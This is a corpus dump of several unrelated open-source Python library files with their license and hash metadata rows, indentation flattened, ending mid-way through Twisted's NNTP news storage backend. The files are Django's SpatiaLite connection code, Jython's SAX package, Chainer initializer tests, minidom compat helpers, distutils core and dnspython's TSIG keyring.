'The pysqlite library does not support C extension loading. '
'Both SQLite and pysqlite must be configured to allow '
'the loading of extensions to use SpatiaLite.')
# Loading the SpatiaLite library extension on the connection, and returning
# the created cursor.
cur = conn.cursor(factory=SQLiteCursorWrapper)
try:
cur.execute("SELECT load_extension(%s)", (self.spatialite_lib,))
except Exception as msg:
new_msg = (
'Unable to load the SpatiaLite library extension '
'"%s" because: %s') % (self.spatialite_lib, msg)
six.reraise(ImproperlyConfigured, ImproperlyConfigured(new_msg), sys.exc_info()[2])
cur.close()
return conn
def prepare_database(self):
super(DatabaseWrapper, self).prepare_database()
# Check if spatial metadata have been initialized in the database
with self.cursor() as cursor:
cursor.execute("PRAGMA table_info(geometry_columns);")
if cursor.fetchall() == []:
arg = "1" if self.features.supports_initspatialmetadata_in_one_transaction else ""
cursor.execute("SELECT InitSpatialMetaData(%s)" % arg)
| bsd-3-clause | 6,232,210,689,642,760,000 | 4,667,479,576,248,845,000 | 47.2 | 98 | 0.643707 | false |
salguarnieri/intellij-community | python/lib/Lib/xml/sax/__init__.py | 117 | 3413 | """Simple API for XML (SAX) implementation for Python.
This module provides an implementation of the SAX 2 interface;
information about the Java version of the interface can be found at
http://www.megginson.com/SAX/. The Python version of the interface is
documented at <...>.
This package contains the following modules:
handler -- Base classes and constants which define the SAX 2 API for
the 'client-side' of SAX for Python.
saxutils -- Implementation of the convenience classes commonly used to
work with SAX.
xmlreader -- Base classes and constants which define the SAX 2 API for
the parsers used with SAX for Python.
drivers2 -- Contains the driver for that wraps a Java sax implementation in python
objects.
"""
from xmlreader import InputSource
from handler import ContentHandler, ErrorHandler
from _exceptions import SAXException, SAXNotRecognizedException, \
SAXParseException, SAXNotSupportedException, \
SAXReaderNotAvailable
def parse(source, handler, errorHandler=ErrorHandler()):
parser = make_parser()
parser.setContentHandler(handler)
parser.setErrorHandler(errorHandler)
parser.parse(source)
def parseString(string, handler, errorHandler=ErrorHandler()):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
if errorHandler is None:
errorHandler = ErrorHandler()
parser = make_parser()
parser.setContentHandler(handler)
parser.setErrorHandler(errorHandler)
inpsrc = InputSource()
inpsrc.setByteStream(StringIO(string))
parser.parse(inpsrc)
# this is the parser list used by the make_parser function if no
# alternatives are given as parameters to the function
default_parser_list = ["xml.sax.drivers2.drv_javasax"]
# tell modulefinder that importing sax potentially imports expatreader
_false = 0
if _false:
import xml.sax.drivers2.drv_javasax
import os, sys
if os.environ.has_key("PY_SAX_PARSER"):
default_parser_list = os.environ["PY_SAX_PARSER"].split(",")
del os
_key = "python.xml.sax.parser"
if sys.platform[:4] == "java" and sys.registry.containsKey(_key):
default_parser_list = sys.registry.getProperty(_key).split(",")
def make_parser(parser_list = []):
"""Creates and returns a SAX parser.
Creates the first parser it is able to instantiate of the ones
given in the list created by doing parser_list +
default_parser_list. The lists must contain the names of Python
modules containing both a SAX parser and a create_parser function."""
for parser_name in parser_list + default_parser_list:
try:
return _create_parser(parser_name)
except ImportError,e:
import sys
if sys.modules.has_key(parser_name):
# The parser module was found, but importing it
# failed unexpectedly, pass this exception through
raise
except SAXReaderNotAvailable:
# The parser module detected that it won't work properly,
# so try the next one
pass
raise SAXReaderNotAvailable("No parsers found", None)
# --- Internal utility methods used by make_parser
def _create_parser(parser_name):
drv_module = __import__(parser_name,{},{},['create_parser'])
return drv_module.create_parser()
del sys
| apache-2.0 | -6,603,923,085,846,985,000 | 5,238,758,412,420,869,000 | 32.460784 | 82 | 0.696455 | false |
keisuke-umezawa/chainer | tests/chainer_tests/initializer_tests/test_constant.py | 4 | 3718 | import unittest
from chainer import backend
from chainer.backends import cuda
from chainer import initializers
from chainer import testing
from chainer.testing import attr
import numpy
@testing.parameterize(*testing.product({
'dtype': [numpy.float16, numpy.float32, numpy.float64],
}))
class TestIdentity(unittest.TestCase):
scale = 0.1
shape = (2, 2)
def setUp(self):
self.check_options = {}
if self.dtype == numpy.float16:
self.check_options = {'atol': 1e-4, 'rtol': 1e-3}
def check_initializer(self, w):
initializer = initializers.Identity(scale=self.scale)
initializer(w)
testing.assert_allclose(
w, self.scale * numpy.identity(len(self.shape)),
**self.check_options)
def test_initializer_cpu(self):
w = numpy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
@attr.gpu
def test_initializer_gpu(self):
w = cuda.cupy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
def check_shaped_initializer(self, xp):
initializer = initializers.Identity(
scale=self.scale, dtype=self.dtype)
w = initializers.generate_array(initializer, self.shape, xp)
self.assertIs(backend.get_array_module(w), xp)
self.assertTupleEqual(w.shape, self.shape)
self.assertEqual(w.dtype, self.dtype)
testing.assert_allclose(
w, self.scale * numpy.identity(len(self.shape)),
**self.check_options)
def test_shaped_initializer_cpu(self):
self.check_shaped_initializer(numpy)
@attr.gpu
def test_shaped_initializer_gpu(self):
self.check_shaped_initializer(cuda.cupy)
@testing.parameterize(
{'shape': (2, 3)},
{'shape': (2, 2, 4)},
{'shape': ()},
{'shape': 0})
class TestIdentityInvalid(unittest.TestCase):
def setUp(self):
self.initializer = initializers.Identity()
def test_invalid_shape(self):
w = numpy.empty(self.shape, dtype=numpy.float32)
with self.assertRaises(ValueError):
self.initializer(w)
@testing.parameterize(*testing.product({
'dtype': [numpy.float16, numpy.float32, numpy.float64],
}))
class TestConstant(unittest.TestCase):
fill_value = 0.1
shape = (2, 3)
def setUp(self):
self.check_options = {}
if self.dtype == numpy.float16:
self.check_options = {'atol': 1e-4, 'rtol': 1e-3}
def check_initializer(self, w):
initializer = initializers.Constant(fill_value=self.fill_value)
initializer(w)
testing.assert_allclose(
w, numpy.full(self.shape, self.fill_value),
**self.check_options)
def test_initializer_cpu(self):
w = numpy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
@attr.gpu
def test_initializer_gpu(self):
w = cuda.cupy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
def check_shaped_initializer(self, xp):
initializer = initializers.Constant(
fill_value=self.fill_value, dtype=self.dtype)
w = initializers.generate_array(initializer, self.shape, xp)
self.assertIs(backend.get_array_module(w), xp)
self.assertTupleEqual(w.shape, self.shape)
self.assertEqual(w.dtype, self.dtype)
testing.assert_allclose(
w, numpy.full(self.shape, self.fill_value),
**self.check_options)
def test_shaped_initializer_cpu(self):
self.check_shaped_initializer(numpy)
@attr.gpu
def test_shaped_initializer_gpu(self):
self.check_shaped_initializer(cuda.cupy)
testing.run_module(__name__, __file__)
| mit | 5,577,818,868,722,510,000 | 3,836,712,344,619,273,000 | 29.227642 | 71 | 0.638784 | false |
jlspyaozhongkai/Uter | third_party_backup/Python-2.7.9/Lib/xml/dom/minicompat.py | 209 | 3330 | """Python version compatibility support for minidom."""
# This module should only be imported using "import *".
#
# The following names are defined:
#
# NodeList -- lightest possible NodeList implementation
#
# EmptyNodeList -- lightest possible NodeList that is guaranteed to
# remain empty (immutable)
#
# StringTypes -- tuple of defined string types
#
# defproperty -- function used in conjunction with GetattrMagic;
# using these together is needed to make them work
# as efficiently as possible in both Python 2.2+
# and older versions. For example:
#
# class MyClass(GetattrMagic):
# def _get_myattr(self):
# return something
#
# defproperty(MyClass, "myattr",
# "return some value")
#
# For Python 2.2 and newer, this will construct a
# property object on the class, which avoids
# needing to override __getattr__(). It will only
# work for read-only attributes.
#
# For older versions of Python, inheriting from
# GetattrMagic will use the traditional
# __getattr__() hackery to achieve the same effect,
# but less efficiently.
#
# defproperty() should be used for each version of
# the relevant _get_<property>() function.
__all__ = ["NodeList", "EmptyNodeList", "StringTypes", "defproperty"]
import xml.dom
try:
unicode
except NameError:
StringTypes = type(''),
else:
StringTypes = type(''), type(unicode(''))
class NodeList(list):
__slots__ = ()
def item(self, index):
if 0 <= index < len(self):
return self[index]
def _get_length(self):
return len(self)
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def __getstate__(self):
return list(self)
def __setstate__(self, state):
self[:] = state
class EmptyNodeList(tuple):
__slots__ = ()
def __add__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def __radd__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def item(self, index):
return None
def _get_length(self):
return 0
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def defproperty(klass, name, doc):
get = getattr(klass, ("_get_" + name)).im_func
def set(self, value, name=name):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute " + repr(name))
assert not hasattr(klass, "_set_" + name), \
"expected not to find _set_" + name
prop = property(get, set, doc=doc)
setattr(klass, name, prop)
| gpl-3.0 | -4,882,778,350,645,545,000 | 7,389,239,377,419,569,000 | 29.272727 | 70 | 0.558258 | false |
zhjunlang/kbengine | kbe/res/scripts/common/Lib/distutils/core.py | 80 | 8909 | """distutils.core
The only module that needs to be imported to use the Distutils; provides
the 'setup' function (which is to be called from the setup script). Also
indirectly provides the Distribution and Command classes, although they are
really defined in distutils.dist and distutils.cmd.
"""
import os
import sys
from distutils.debug import DEBUG
from distutils.errors import *
# Mainly import these so setup scripts can "from distutils.core import" them.
from distutils.dist import Distribution
from distutils.cmd import Command
from distutils.config import PyPIRCCommand
from distutils.extension import Extension
# This is a barebones help message generated displayed when the user
# runs the setup script with no arguments at all. More useful help
# is generated with various --help options: global help, list commands,
# and per-command help.
USAGE = """\
usage: %(script)s [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: %(script)s --help [cmd1 cmd2 ...]
or: %(script)s --help-commands
or: %(script)s cmd --help
"""
def gen_usage (script_name):
script = os.path.basename(script_name)
return USAGE % vars()
# Some mild magic to control the behaviour of 'setup()' from 'run_setup()'.
_setup_stop_after = None
_setup_distribution = None
# Legal keyword arguments for the setup() function
setup_keywords = ('distclass', 'script_name', 'script_args', 'options',
'name', 'version', 'author', 'author_email',
'maintainer', 'maintainer_email', 'url', 'license',
'description', 'long_description', 'keywords',
'platforms', 'classifiers', 'download_url',
'requires', 'provides', 'obsoletes',
)
# Legal keyword arguments for the Extension constructor
extension_keywords = ('name', 'sources', 'include_dirs',
'define_macros', 'undef_macros',
'library_dirs', 'libraries', 'runtime_library_dirs',
'extra_objects', 'extra_compile_args', 'extra_link_args',
'swig_opts', 'export_symbols', 'depends', 'language')
def setup (**attrs):
"""The gateway to the Distutils: do everything your setup script needs
to do, in a highly flexible and user-driven way. Briefly: create a
Distribution instance; find and parse config files; parse the command
line; run each Distutils command found there, customized by the options
supplied to 'setup()' (as keyword arguments), in config files, and on
the command line.
The Distribution instance might be an instance of a class supplied via
the 'distclass' keyword argument to 'setup'; if no such class is
supplied, then the Distribution class (in dist.py) is instantiated.
All other arguments to 'setup' (except for 'cmdclass') are used to set
attributes of the Distribution instance.
The 'cmdclass' argument, if supplied, is a dictionary mapping command
names to command classes. Each command encountered on the command line
will be turned into a command class, which is in turn instantiated; any
class found in 'cmdclass' is used in place of the default, which is
(for command 'foo_bar') class 'foo_bar' in module
'distutils.command.foo_bar'. The command class must provide a
'user_options' attribute which is a list of option specifiers for
'distutils.fancy_getopt'. Any command-line options between the current
and the next command are used to set attributes of the current command
object.
When the entire command-line has been successfully parsed, calls the
'run()' method on each command object in turn. This method will be
driven entirely by the Distribution object (which each command object
has a reference to, thanks to its constructor), and the
command-specific options that became attributes of each command
object.
"""
global _setup_stop_after, _setup_distribution
# Determine the distribution class -- either caller-supplied or
# our Distribution (see below).
klass = attrs.get('distclass')
if klass:
del attrs['distclass']
else:
klass = Distribution
if 'script_name' not in attrs:
attrs['script_name'] = os.path.basename(sys.argv[0])
if 'script_args' not in attrs:
attrs['script_args'] = sys.argv[1:]
# Create the Distribution instance, using the remaining arguments
# (ie. everything except distclass) to initialize it
try:
_setup_distribution = dist = klass(attrs)
except DistutilsSetupError as msg:
if 'name' not in attrs:
raise SystemExit("error in setup command: %s" % msg)
else:
raise SystemExit("error in %s setup command: %s" % \
(attrs['name'], msg))
if _setup_stop_after == "init":
return dist
# Find and parse the config file(s): they will override options from
# the setup script, but be overridden by the command line.
dist.parse_config_files()
if DEBUG:
print("options (after parsing config files):")
dist.dump_option_dicts()
if _setup_stop_after == "config":
return dist
# Parse the command line and override config files; any
# command-line errors are the end user's fault, so turn them into
# SystemExit to suppress tracebacks.
try:
ok = dist.parse_command_line()
except DistutilsArgError as msg:
raise SystemExit(gen_usage(dist.script_name) + "\nerror: %s" % msg)
if DEBUG:
print("options (after parsing command line):")
dist.dump_option_dicts()
if _setup_stop_after == "commandline":
return dist
# And finally, run all the commands found on the command line.
if ok:
try:
dist.run_commands()
except KeyboardInterrupt:
raise SystemExit("interrupted")
except OSError as exc:
if DEBUG:
sys.stderr.write("error: %s\n" % (exc,))
raise
else:
raise SystemExit("error: %s" % (exc,))
except (DistutilsError,
CCompilerError) as msg:
if DEBUG:
raise
else:
raise SystemExit("error: " + str(msg))
return dist
# setup ()
def run_setup (script_name, script_args=None, stop_after="run"):
"""Run a setup script in a somewhat controlled environment, and
return the Distribution instance that drives things. This is useful
if you need to find out the distribution meta-data (passed as
keyword args from 'script' to 'setup()', or the contents of the
config files or command-line.
'script_name' is a file that will be read and run with 'exec()';
'sys.argv[0]' will be replaced with 'script' for the duration of the
call. 'script_args' is a list of strings; if supplied,
'sys.argv[1:]' will be replaced by 'script_args' for the duration of
the call.
'stop_after' tells 'setup()' when to stop processing; possible
values:
init
stop after the Distribution instance has been created and
populated with the keyword arguments to 'setup()'
config
stop after config files have been parsed (and their data
stored in the Distribution instance)
commandline
stop after the command-line ('sys.argv[1:]' or 'script_args')
have been parsed (and the data stored in the Distribution)
run [default]
stop after all commands have been run (the same as if 'setup()'
had been called in the usual way
Returns the Distribution instance, which provides all information
used to drive the Distutils.
"""
if stop_after not in ('init', 'config', 'commandline', 'run'):
raise ValueError("invalid value for 'stop_after': %r" % (stop_after,))
global _setup_stop_after, _setup_distribution
_setup_stop_after = stop_after
save_argv = sys.argv
g = {'__file__': script_name}
l = {}
try:
try:
sys.argv[0] = script_name
if script_args is not None:
sys.argv[1:] = script_args
with open(script_name, 'rb') as f:
exec(f.read(), g, l)
finally:
sys.argv = save_argv
_setup_stop_after = None
except SystemExit:
# Hmm, should we do something if exiting with a non-zero code
# (ie. error)?
pass
except:
raise
if _setup_distribution is None:
raise RuntimeError(("'distutils.core.setup()' was never called -- "
"perhaps '%s' is not a Distutils setup script?") % \
script_name)
# I wonder if the setup script's namespace -- g and l -- would be of
# any interest to callers?
#print "_setup_distribution:", _setup_distribution
return _setup_distribution
# run_setup ()
| lgpl-3.0 | -5,788,361,553,645,367,000 | -2,178,444,165,739,443,500 | 36.590717 | 79 | 0.645078 | false |
skuarch/namebench | nb_third_party/dns/tsigkeyring.py | 248 | 1658 | # Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""A place to store TSIG keys."""
import base64
import dns.name
def from_text(textring):
"""Convert a dictionary containing (textual DNS name, base64 secret) pairs
into a binary keyring which has (dns.name.Name, binary secret) pairs.
@rtype: dict"""
keyring = {}
for keytext in textring:
keyname = dns.name.from_text(keytext)
secret = base64.decodestring(textring[keytext])
keyring[keyname] = secret
return keyring
def to_text(keyring):
"""Convert a dictionary containing (dns.name.Name, binary secret) pairs
into a text keyring which has (textual DNS name, base64 secret) pairs.
@rtype: dict"""
textring = {}
for keyname in keyring:
keytext = dns.name.to_text(keyname)
secret = base64.encodestring(keyring[keyname])
textring[keytext] = secret
return textring
| apache-2.0 | 8,549,442,347,209,745,000 | 1,712,266,188,436,656,600 | 36.681818 | 78 | 0.720748 | false |
kemalakyol48/python-for-android | python-modules/twisted/twisted/news/database.py | 49 | 33743 | # -*- test-case-name: twisted.news.test -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
News server backend implementations.
"""
import getpass, pickle, time, socket
import os
import StringIO
from email.Message import Message
from email.Generator import Generator
from zope.interface import implements, Interface
from twisted.news.nntp import NNTPError
from twisted.mail import smtp
from twisted.internet import defer
from twisted.enterprise import adbapi
from twisted.persisted import dirdbm
from twisted.python.hashlib import md5
ERR_NOGROUP, ERR_NOARTICLE = range(2, 4) # XXX - put NNTP values here (I guess?)
OVERVIEW_FMT = [
'Subject', 'From', 'Date', 'Message-ID', 'References',
'Bytes', 'Lines', 'Xref'
]
def hexdigest(md5): #XXX: argh. 1.5.2 doesn't have this.
return ''.join(map(lambda x: hex(ord(x))[2:], md5.digest()))
class Article:
def __init__(self, head, body):
self.body = body
self.headers = {}
header = None
for line in head.split('\r\n'):
if line[0] in ' \t':
i = list(self.headers[header])
i[1] += '\r\n' + line
else:
i = line.split(': ', 1)
header = i[0].lower()
self.headers[header] = tuple(i)
if not self.getHeader('Message-ID'):
s = str(time.time()) + self.body
id = hexdigest(md5(s)) + '@' + socket.gethostname()
self.putHeader('Message-ID', '<%s>' % id)
if not self.getHeader('Bytes'):
self.putHeader('Bytes', str(len(self.body)))
if not self.getHeader('Lines'):
self.putHeader('Lines', str(self.body.count('\n')))
if not self.getHeader('Date'):
self.putHeader('Date', time.ctime(time.time()))
def getHeader(self, header):
h = header.lower()
if self.headers.has_key(h):
return self.headers[h][1]
else:
return ''
def putHeader(self, header, value):
self.headers[header.lower()] = (header, value)
def textHeaders(self):
headers = []
for i in self.headers.values():
headers.append('%s: %s' % i)
return '\r\n'.join(headers) + '\r\n'
def overview(self):
xover = []
for i in OVERVIEW_FMT:
xover.append(self.getHeader(i))
return xover
class NewsServerError(Exception):
pass
class INewsStorage(Interface):
"""
An interface for storing and requesting news articles
"""
def listRequest():
"""
Returns a deferred whose callback will be passed a list of 4-tuples
containing (name, max index, min index, flags) for each news group
"""
def subscriptionRequest():
"""
Returns a deferred whose callback will be passed the list of
recommended subscription groups for new server users
"""
def postRequest(message):
"""
Returns a deferred whose callback will be invoked if 'message'
is successfully posted to one or more specified groups and
whose errback will be invoked otherwise.
"""
def overviewRequest():
"""
Returns a deferred whose callback will be passed the a list of
headers describing this server's overview format.
"""
def xoverRequest(group, low, high):
"""
Returns a deferred whose callback will be passed a list of xover
headers for the given group over the given range. If low is None,
the range starts at the first article. If high is None, the range
ends at the last article.
"""
def xhdrRequest(group, low, high, header):
"""
Returns a deferred whose callback will be passed a list of XHDR data
for the given group over the given range. If low is None,
the range starts at the first article. If high is None, the range
ends at the last article.
"""
def listGroupRequest(group):
"""
Returns a deferred whose callback will be passed a two-tuple of
(group name, [article indices])
"""
def groupRequest(group):
"""
Returns a deferred whose callback will be passed a five-tuple of
(group name, article count, highest index, lowest index, group flags)
"""
def articleExistsRequest(id):
"""
Returns a deferred whose callback will be passed with a true value
if a message with the specified Message-ID exists in the database
and with a false value otherwise.
"""
def articleRequest(group, index, id = None):
"""
Returns a deferred whose callback will be passed a file-like object
containing the full article text (headers and body) for the article
of the specified index in the specified group, and whose errback
will be invoked if the article or group does not exist. If id is
not None, index is ignored and the article with the given Message-ID
will be returned instead, along with its index in the specified
group.
"""
def headRequest(group, index):
"""
Returns a deferred whose callback will be passed the header for
the article of the specified index in the specified group, and
whose errback will be invoked if the article or group does not
exist.
"""
def bodyRequest(group, index):
"""
Returns a deferred whose callback will be passed the body for
the article of the specified index in the specified group, and
whose errback will be invoked if the article or group does not
exist.
"""
class NewsStorage:
"""
Backwards compatibility class -- There is no reason to inherit from this,
just implement INewsStorage instead.
"""
def listRequest(self):
raise NotImplementedError()
def subscriptionRequest(self):
raise NotImplementedError()
def postRequest(self, message):
raise NotImplementedError()
def overviewRequest(self):
return defer.succeed(OVERVIEW_FMT)
def xoverRequest(self, group, low, high):
raise NotImplementedError()
def xhdrRequest(self, group, low, high, header):
raise NotImplementedError()
def listGroupRequest(self, group):
raise NotImplementedError()
def groupRequest(self, group):
raise NotImplementedError()
def articleExistsRequest(self, id):
raise NotImplementedError()
def articleRequest(self, group, index, id = None):
raise NotImplementedError()
def headRequest(self, group, index):
raise NotImplementedError()
def bodyRequest(self, group, index):
raise NotImplementedError()
class _ModerationMixin:
"""
Storage implementations can inherit from this class to get the easy-to-use
C{notifyModerators} method which will take care of sending messages which
require moderation to a list of moderators.
"""
sendmail = staticmethod(smtp.sendmail)
def notifyModerators(self, moderators, article):
"""
Send an article to a list of group moderators to be moderated.
@param moderators: A C{list} of C{str} giving RFC 2821 addresses of
group moderators to notify.
@param article: The article requiring moderation.
@type article: L{Article}
@return: A L{Deferred} which fires with the result of sending the email.
"""
# Moderated postings go through as long as they have an Approved
# header, regardless of what the value is
group = article.getHeader('Newsgroups')
subject = article.getHeader('Subject')
if self._sender is None:
# This case should really go away. This isn't a good default.
sender = 'twisted-news@' + socket.gethostname()
else:
sender = self._sender
msg = Message()
msg['Message-ID'] = smtp.messageid()
msg['From'] = sender
msg['To'] = ', '.join(moderators)
msg['Subject'] = 'Moderate new %s message: %s' % (group, subject)
msg['Content-Type'] = 'message/rfc822'
payload = Message()
for header, value in article.headers.values():
payload.add_header(header, value)
payload.set_payload(article.body)
msg.attach(payload)
out = StringIO.StringIO()
gen = Generator(out, False)
gen.flatten(msg)
msg = out.getvalue()
return self.sendmail(self._mailhost, sender, moderators, msg)
class PickleStorage(_ModerationMixin):
"""
A trivial NewsStorage implementation using pickles
Contains numerous flaws and is generally unsuitable for any
real applications. Consider yourself warned!
"""
implements(INewsStorage)
sharedDBs = {}
def __init__(self, filename, groups=None, moderators=(),
mailhost=None, sender=None):
"""
@param mailhost: A C{str} giving the mail exchange host which will
accept moderation emails from this server. Must accept emails
destined for any address specified as a moderator.
@param sender: A C{str} giving the address which will be used as the
sender of any moderation email generated by this server.
"""
self.datafile = filename
self.load(filename, groups, moderators)
self._mailhost = mailhost
self._sender = sender
def getModerators(self, groups):
# first see if any groups are moderated. if so, nothing gets posted,
# but the whole messages gets forwarded to the moderator address
moderators = []
for group in groups:
moderators.extend(self.db['moderators'].get(group, None))
return filter(None, moderators)
def listRequest(self):
"Returns a list of 4-tuples: (name, max index, min index, flags)"
l = self.db['groups']
r = []
for i in l:
if len(self.db[i].keys()):
low = min(self.db[i].keys())
high = max(self.db[i].keys()) + 1
else:
low = high = 0
if self.db['moderators'].has_key(i):
flags = 'm'
else:
flags = 'y'
r.append((i, high, low, flags))
return defer.succeed(r)
def subscriptionRequest(self):
return defer.succeed(['alt.test'])
def postRequest(self, message):
cleave = message.find('\r\n\r\n')
headers, article = message[:cleave], message[cleave + 4:]
a = Article(headers, article)
groups = a.getHeader('Newsgroups').split()
xref = []
# Check moderated status
moderators = self.getModerators(groups)
if moderators and not a.getHeader('Approved'):
return self.notifyModerators(moderators, a)
for group in groups:
if self.db.has_key(group):
if len(self.db[group].keys()):
index = max(self.db[group].keys()) + 1
else:
index = 1
xref.append((group, str(index)))
self.db[group][index] = a
if len(xref) == 0:
return defer.fail(None)
a.putHeader('Xref', '%s %s' % (
socket.gethostname().split()[0],
''.join(map(lambda x: ':'.join(x), xref))
))
self.flush()
return defer.succeed(None)
def overviewRequest(self):
return defer.succeed(OVERVIEW_FMT)
def xoverRequest(self, group, low, high):
if not self.db.has_key(group):
return defer.succeed([])
r = []
for i in self.db[group].keys():
if (low is None or i >= low) and (high is None or i <= high):
r.append([str(i)] + self.db[group][i].overview())
return defer.succeed(r)
def xhdrRequest(self, group, low, high, header):
if not self.db.has_key(group):
return defer.succeed([])
r = []
for i in self.db[group].keys():
if low is None or i >= low and high is None or i <= high:
r.append((i, self.db[group][i].getHeader(header)))
return defer.succeed(r)
def listGroupRequest(self, group):
if self.db.has_key(group):
return defer.succeed((group, self.db[group].keys()))
else:
return defer.fail(None)
def groupRequest(self, group):
if self.db.has_key(group):
if len(self.db[group].keys()):
num = len(self.db[group].keys())
low = min(self.db[group].keys())
high = max(self.db[group].keys())
else:
num = low = high = 0
flags = 'y'
return defer.succeed((group, num, high, low, flags))
else:
return defer.fail(ERR_NOGROUP)
def articleExistsRequest(self, id):
for group in self.db['groups']:
for a in self.db[group].values():
if a.getHeader('Message-ID') == id:
return defer.succeed(1)
return defer.succeed(0)
def articleRequest(self, group, index, id = None):
if id is not None:
raise NotImplementedError
if self.db.has_key(group):
if self.db[group].has_key(index):
a = self.db[group][index]
return defer.succeed((
index,
a.getHeader('Message-ID'),
StringIO.StringIO(a.textHeaders() + '\r\n' + a.body)
))
else:
return defer.fail(ERR_NOARTICLE)
else:
return defer.fail(ERR_NOGROUP)
def headRequest(self, group, index):
if self.db.has_key(group):
if self.db[group].has_key(index):
a = self.db[group][index]
return defer.succeed((index, a.getHeader('Message-ID'), a.textHeaders()))
else:
return defer.fail(ERR_NOARTICLE)
else:
return defer.fail(ERR_NOGROUP)
def bodyRequest(self, group, index):
if self.db.has_key(group):
if self.db[group].has_key(index):
a = self.db[group][index]
return defer.succeed((index, a.getHeader('Message-ID'), StringIO.StringIO(a.body)))
else:
return defer.fail(ERR_NOARTICLE)
else:
return defer.fail(ERR_NOGROUP)
def flush(self):
f = open(self.datafile, 'w')
pickle.dump(self.db, f)
f.close()
def load(self, filename, groups = None, moderators = ()):
if PickleStorage.sharedDBs.has_key(filename):
self.db = PickleStorage.sharedDBs[filename]
else:
try:
self.db = pickle.load(open(filename))
PickleStorage.sharedDBs[filename] = self.db
except IOError:
self.db = PickleStorage.sharedDBs[filename] = {}
self.db['groups'] = groups
if groups is not None:
for i in groups:
self.db[i] = {}
self.db['moderators'] = dict(moderators)
self.flush()
class Group:
name = None
flags = ''
minArticle = 1
maxArticle = 0
articles = None
def __init__(self, name, flags = 'y'):
self.name = name
self.flags = flags
self.articles = {}
class NewsShelf(_ModerationMixin):
"""
A NewStorage implementation using Twisted's dirdbm persistence module.
"""
implements(INewsStorage)
def __init__(self, mailhost, path, sender=None):
"""
@param mailhost: A C{str} giving the mail exchange host which will
accept moderation emails from this server. Must accept emails
destined for any address specified as a moderator.
@param sender: A C{str} giving the address which will be used as the
sender of any moderation email generated by this server.
"""
self.path = path
self._mailhost = self.mailhost = mailhost
self._sender = sender
if not os.path.exists(path):
os.mkdir(path)
self.dbm = dirdbm.Shelf(os.path.join(path, "newsshelf"))
if not len(self.dbm.keys()):
self.initialize()
def initialize(self):
# A dictionary of group name/Group instance items
self.dbm['groups'] = dirdbm.Shelf(os.path.join(self.path, 'groups'))
# A dictionary of group name/email address
self.dbm['moderators'] = dirdbm.Shelf(os.path.join(self.path, 'moderators'))
# A list of group names
self.dbm['subscriptions'] = []
# A dictionary of MessageID strings/xref lists
self.dbm['Message-IDs'] = dirdbm.Shelf(os.path.join(self.path, 'Message-IDs'))
def addGroup(self, name, flags):
self.dbm['groups'][name] = Group(name, flags)
def addSubscription(self, name):
self.dbm['subscriptions'] = self.dbm['subscriptions'] + [name]
def addModerator(self, group, email):
self.dbm['moderators'][group] = email
def listRequest(self):
result = []
for g in self.dbm['groups'].values():
result.append((g.name, g.maxArticle, g.minArticle, g.flags))
return defer.succeed(result)
def subscriptionRequest(self):
return defer.succeed(self.dbm['subscriptions'])
def getModerator(self, groups):
# first see if any groups are moderated. if so, nothing gets posted,
# but the whole messages gets forwarded to the moderator address
for group in groups:
try:
return self.dbm['moderators'][group]
except KeyError:
pass
return None
def notifyModerator(self, moderator, article):
"""
Notify a single moderator about an article requiring moderation.
C{notifyModerators} should be preferred.
"""
return self.notifyModerators([moderator], article)
def postRequest(self, message):
cleave = message.find('\r\n\r\n')
headers, article = message[:cleave], message[cleave + 4:]
article = Article(headers, article)
groups = article.getHeader('Newsgroups').split()
xref = []
# Check for moderated status
moderator = self.getModerator(groups)
if moderator and not article.getHeader('Approved'):
return self.notifyModerators([moderator], article)
for group in groups:
try:
g = self.dbm['groups'][group]
except KeyError:
pass
else:
index = g.maxArticle + 1
g.maxArticle += 1
g.articles[index] = article
xref.append((group, str(index)))
self.dbm['groups'][group] = g
if not xref:
return defer.fail(NewsServerError("No groups carried: " + ' '.join(groups)))
article.putHeader('Xref', '%s %s' % (socket.gethostname().split()[0], ' '.join(map(lambda x: ':'.join(x), xref))))
self.dbm['Message-IDs'][article.getHeader('Message-ID')] = xref
return defer.succeed(None)
def overviewRequest(self):
return defer.succeed(OVERVIEW_FMT)
def xoverRequest(self, group, low, high):
if not self.dbm['groups'].has_key(group):
return defer.succeed([])
if low is None:
low = 0
if high is None:
high = self.dbm['groups'][group].maxArticle
r = []
for i in range(low, high + 1):
if self.dbm['groups'][group].articles.has_key(i):
r.append([str(i)] + self.dbm['groups'][group].articles[i].overview())
return defer.succeed(r)
def xhdrRequest(self, group, low, high, header):
if group not in self.dbm['groups']:
return defer.succeed([])
if low is None:
low = 0
if high is None:
high = self.dbm['groups'][group].maxArticle
r = []
for i in range(low, high + 1):
if self.dbm['groups'][group].articles.has_key(i):
r.append((i, self.dbm['groups'][group].articles[i].getHeader(header)))
return defer.succeed(r)
def listGroupRequest(self, group):
if self.dbm['groups'].has_key(group):
